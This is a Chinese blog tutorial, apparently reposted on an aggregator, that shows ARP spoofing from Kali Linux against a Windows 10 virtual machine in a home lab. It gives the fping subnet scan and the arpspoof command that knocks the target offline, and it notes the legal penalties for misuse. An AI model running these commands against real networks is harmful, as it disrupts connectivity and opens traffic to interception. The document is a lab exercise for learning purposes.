admin管理员组文章数量:1654510
目录
一.前言
二.实验机器
三.实验过程
实验准备
被攻击机IP
被攻击机网管
实验开始
查询局域网内ip
开始攻击
Windows被攻击状态
Windows和kali网管状态
参考文章
一.前言
本次依然使用Kali系统演示ARP欺骗,导致局域网目标设备无法上网。
根据我国《刑法》第二百八十六条的规定,违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役,后果特别严重的,处五年以上有期徒刑。 谨慎操作,请勿违法!
二.实验机器
被攻击机(虚拟机windows10专业版)
攻击机 (虚拟机kali)
三.实验过程
实验准备
被攻击机IP
ip:192.168.17.130
被攻击机网管
Win10
cmd指令:arp -a(查看arp缓存)
此时可上网
实验开始
查询局域网内ip
Kali输入
指令:fping -asg 局域网范围
我的是:fping -asg 192.168.17.0/24
(注意:如果kali权限不够的话需要在kali内使用指令:sudo su)
(这里原本我的win10虚拟机的IP为192.168.17.130,但是kali查询只有129,我后面攻击按照130处理)
开始攻击
Kali
指令:arpspoof -i 网卡 -t 靶机IP地址 网关
我的是arpspoof -i eth0 -t 192.168.17.130 192.168.17.2
这里出了点小问题
但是我没有dsniff,并且安装不了(如下图)
解决方案:
在kali输入1. sudo apt-get update
2. sudo apt-get install dsniff(如下图)
继续实验
Windows被攻击状态
Windows和kali网管状态
这时Windows网管(见右图)Kali的网管(见左图)
Windows网管已经和kali的网管变成一致
这篇文章到这里就结束了,如果大家没有安装win10虚拟机的话可以看我的这篇文章
VMware虚拟机win10专业版激活_顾轩367的博客-CSDN博客
参考文章
网络安全--使用Kali进行ARP欺骗(详细教程)_kaliarp欺骗_懷淰メ的博客-CSDN博客
版权声明:本文标题:VMware虚拟机kali对win10进行ARP欺骗(2023516) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729677235a1209843.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论